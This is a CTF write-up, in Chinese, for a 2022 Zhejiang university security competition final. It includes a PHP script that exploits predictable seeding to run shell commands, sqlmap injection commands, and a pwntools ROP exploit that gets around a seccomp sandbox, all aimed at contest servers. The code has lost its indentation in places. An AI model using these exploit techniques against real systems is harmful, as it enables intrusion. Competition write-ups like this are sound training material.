第五届浙江省大学生网络与信息安全竞赛技能挑战赛(决赛)
date
Sep 24, 2022
slug
nisc2022-finals
status
Published
tags
CTF
WriteUP
summary
type
Post
- 名称:签个到我就跑Ⅱ
- 排名:2
Web
ezphp
<?php
$cmd="cat%20/flag";
mt_srand(time()+1);
$a=array("system",$cmd);
for ($i=0;$i<=10000;$i++){
array_push($a,"Ctfer");
}
shuffle($a);
$b=array_search("system",$a);
$c=array_search($cmd,$a);
echo $a[$b];//system
echo $a[$c];//ls%20/
$curl=curl_init();
curl_setopt($curl,CURLOPT_URL,'http://1.14.97.218:23043/index.php?cmd='.$cmd."&b=".$b."&c=".$c);
curl_setopt($curl,CURLOPT_HEADER,1);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
$data=curl_exec($curl);
curl_close($curl);
print_r($data);
$cmd="cat%20/flag";
mt_srand(time()+2);
$a=array("system",$cmd);
for ($i=0;$i<=10000;$i++){
array_push($a,"Ctfer");
}
shuffle($a);
$b=array_search("system",$a);
$c=array_search($cmd,$a);
echo $a[$b];//system
echo $a[$c];//ls%20/
$curl=curl_init();
curl_setopt($curl,CURLOPT_URL,'http://1.14.97.218:23043/index.php?cmd='.$cmd."&b=".$b."&c=".$c);
curl_setopt($curl,CURLOPT_HEADER,1);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
$data=curl_exec($curl);
curl_close($curl);
print_r($data);
$cmd="cat%20/flag";
mt_srand(time()+3);
$a=array("system",$cmd);
for ($i=0;$i<=10000;$i++){
array_push($a,"Ctfer");
}
shuffle($a);
$b=array_search("system",$a);
$c=array_search($cmd,$a);
echo $a[$b];//system
echo $a[$c];//ls%20/
$curl=curl_init();
curl_setopt($curl,CURLOPT_URL,'http://1.14.97.218:23043/index.php?cmd='.$cmd."&b=".$b."&c=".$c);
curl_setopt($curl,CURLOPT_HEADER,1);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
$data=curl_exec($curl);
curl_close($curl);
print_r($data);
$cmd="cat%20/flag";
mt_srand(time()+4);
$a=array("system",$cmd);
for ($i=0;$i<=10000;$i++){
array_push($a,"Ctfer");
}
shuffle($a);
$b=array_search("system",$a);
$c=array_search($cmd,$a);
echo $a[$b];//system
echo $a[$c];//ls%20/
$curl=curl_init();
curl_setopt($curl,CURLOPT_URL,'http://1.14.97.218:23043/index.php?cmd='.$cmd."&b=".$b."&c=".$c);
curl_setopt($curl,CURLOPT_HEADER,1);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
$data=curl_exec($curl);
curl_close($curl);
print_r($data);
本地部署发包
babysql
sqlmap直接爆
sqlmap -u http://1.14.97.218:20461/search.php?id=1 -tamper="space2comment.py"
sqlmap -u http://1.14.97.218:20461/search.php?id=1 -tamper="space2comment.py" -D ctf -tablesflag在ctf库中的email表中的email_id
PWN
GO-MAZE-v4
”童年回忆小迷宫,走完就送flag哦“确实漏洞点放在课迷宫走完之后,通过cyclic生成1000字符后,丢进去测到了存在溢出,偏移0x180,尝试直接用system函数和/bin/sh发现段错误,然后查看发现存在沙箱禁用了execve,
ine CODE JT JF K
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x02 0xc000003e if (A != ARCH_X86_64) goto 0004
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0005
0004: 0x06 0x00 0x00 0x00000000 return KILL
0005: 0x06 0x00 0x00 0x7fff0000 return ALLOW所以是个orw题目,通过ROP来构建ORW即可
EXP:
# coding=utf-8
from pwn import *
#p=process("./pwn")
elf=ELF("./pwn")
p=remote("1.14.97.218","24102")
context.log_level = 'debug'
context(arch='amd64',log_level='debug',os='linux') #x64
def migong():
p.sendline("s")
p.sendline("s")
p.sendline("s")
p.sendline("s")
p.sendline("s")
p.sendline("d")
p.sendline("d")
p.sendline("d")
p.sendline("d")
p.sendline("w")
p.sendline("w")
p.sendline("w")
p.sendline("d")
p.sendline("d")
p.sendline("d")
p.sendline("w")
p.sendline("d")
p.sendline("w")
p.sendline("w")
migong()
#gdb.attach(p)
#pause()
pop_rsi=0x40416f
pop_rdx=0x51d4b6
pop_rax=0x400a4f
syscall=0x4025ab
pop_rdi=0x4008f6
pop_rbx=0x402498
pop_dx_si=0x51d559
buf=0x98a000
leave=0x4015cb
#read write open
# write_plt=0x63A3AE
# open_plt=0x674487
fuck=b''
fuck+=p64(pop_rdi)+p64(0)
fuck+=p64(pop_dx_si)+p64(0x100)+p64(buf+0x300)
fuck+=p64(syscall)+p64(leave)
#fuck+=p64(pop_rdx)+p64(0x100)+p64(syscall)
p.recvuntil('flag')
p.sendline(b'a'*0x178+p64(buf+0x300)+fuck)
# payload="A"*384
# +p64(pop_rdi_ret)+p64(0x72cef8)+p64(0x64E059)
sleep(1)
# payload=388*"a"+"b"*8+p64(0x400A90)
payload=p64(0)+p64(pop_rax)+p64(2)#open
payload+=p64(pop_rdi)+p64(next(elf.search(b'flag')))
payload+=p64(pop_rsi)+p64(0)
payload+=p64(syscall)
payload+=p64(pop_rax)+p64(0)
payload+=p64(pop_rdi)+p64(3)
payload+=p64(pop_rsi)+p64(buf)
payload+=p64(pop_rdx)+p64(0x100)
payload+=p64(syscall)
payload+=p64(pop_rax)+p64(1)
payload+=p64(pop_rdi)+p64(1)
payload+=p64(pop_rsi)+p64(buf)
payload+=p64(pop_rdx)+p64(0x100)
payload+=p64(syscall)
p.sendline(payload)
p.interactive()
RE
EzMath2
upx殼,魔改區段
脫殼
dump
碼表映射
dfs
import string
import sys
sys.setrecursionlimit(10000)
def sub_401120(a1):
return (57 * a1 % 127) & 0x7F
mmp = {}
for i in string.printable:
mmp[i] = sub_401120(ord(i))
print(mmp)
fake = [0] * 18
fake = bytearray(b'QQk/64WG6pq~aQt{pF')
# fake = bytearray(b'583~4q583+382q2d38')
BeingDebugged = 0
for i in range(0, 18, 2):
fake[i] = ((fake[i] + 1) ^ 7)
def search(flag: list, idx):
print(flag)
if idx >= 18:
return
for k in mmp.keys():
if mmp.get(k) == flag[idx + 1]:
mmm = flag.copy()
mmm[idx + 1] = ord(k)
search(mmm, idx + 2)ezandroid
壓縮包打開,搜索pic1.png,flag到手
Crypto
math
威爾遜定理+碼表映射
from gmpy2 import invert
def wilson(x,y):
a = 1
while y<=x-2:
a *= y
a %= x
y += 1
return a
strs = 'abcdefghijklmnopqrstuvwxyz0123456789+='
n = 176778040837484895481963794918312894811914463587783883976856801676290821243853364789418908640505211936881707629753845875997805883248035576046706978993073043757445726165605877196383212378074705385178610178824713153854530726380795438083708575716562524587045312909657881223522830729052758566504582290081411626333
def wilson(A,B):
t=A-B-1
res=-1
k=A-1
for i in range(t):
res=(res*invert(k,A))%A
k=k-1
if(res<0):
return res+A
else:
return res
# 176778040837484895481963794918312894811914463587783883976856801676290821243853364789418908640505211936881707629753845875997805883248035576046706978993073043757445726165605877196383212378074705385178610178824713153854530726380795438083708575716562524587045312909657881223522830729052758566504582290081411626333
key = wilson(n, n-1)
mmp = {}
# c = ''
for i in strs:
k = (strs.index(i) * key + 7) % 37
# c += str[k]
print(mmp.get(strs[k]), (i))
mmp[strs[k]] = i
c = 'u66hp7nuh01puoaip10pi6o0vzavnu11'
m = ''
for i in c:
m += mmp[i]
print(m.replace('=', 'a'))MISC
Unkn0wnData
末尾有base64
解密得到
Where1sKey?
🙃💵🌿🎤🚪🌏🐎🥋🚫😆✅🍍🎤🐘🌏ℹ⌨😍🎈✉🤣🛩🍌🚪🍴ℹ☺🚹❓🍴🔬🌪🍵👣🔄☃👌😎👌🔄👌🔪🍌👁🍍🍌🌏🎃🚰🍵🐍🎅✅🍍🦓😎😊🤣🏹🍍💧🔄🔄🤣👁🥋🚫☺🍴😁🚫😇🚰⏩😍🌿💵🦓😇🛩✖🕹🐎📂📂💧🗒🗒emoji-aes
Stegsolve 拿到壓縮包
看到壓縮包頭,提取解壓得到鍵盤瀏覽
寫個脚本,腦洞key
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
output = []
keys = open(r"D:\CTF\Reverse\zjctf2022\finals\key.txt").read().splitlines()
for l in keys:
# print(l)
output += [[normalKeys[l[4:6]]], [shiftKeys[l[4:6]]]][l[1] == '2']
# print(output)
# if normalKeys[l[4:6]] == '<DEL>':
# del output[-1]
# print(normalKeys[l[4:6]], end='')
print(''.join(output))
realkey = []
for i in range(len(output)):
try:
a=output.index('<DEL>')
del output[a]
realkey += output[a-1]
del output[a-1]
except:
pass
print(''.join(realkey))
print ('output :' + "".join(output))checkin_gift
发现一串base64编码,丢入magic自动解密
m4a
m4a文件写python脚本倒序
with open("m4a","rb") as f:
with open('aa.zip','wb') as g:
g.write(f.read()[::-1])倒序出zip之后用binwalk分离出一个zip
然后听m4a的摩斯电码得到密码
-.../.-/....-/...--/-.../-.-././..-./-.-./..---/-----/....-/BA43BCEFC204
把txt中的内容用cyber的rot47+atbash解密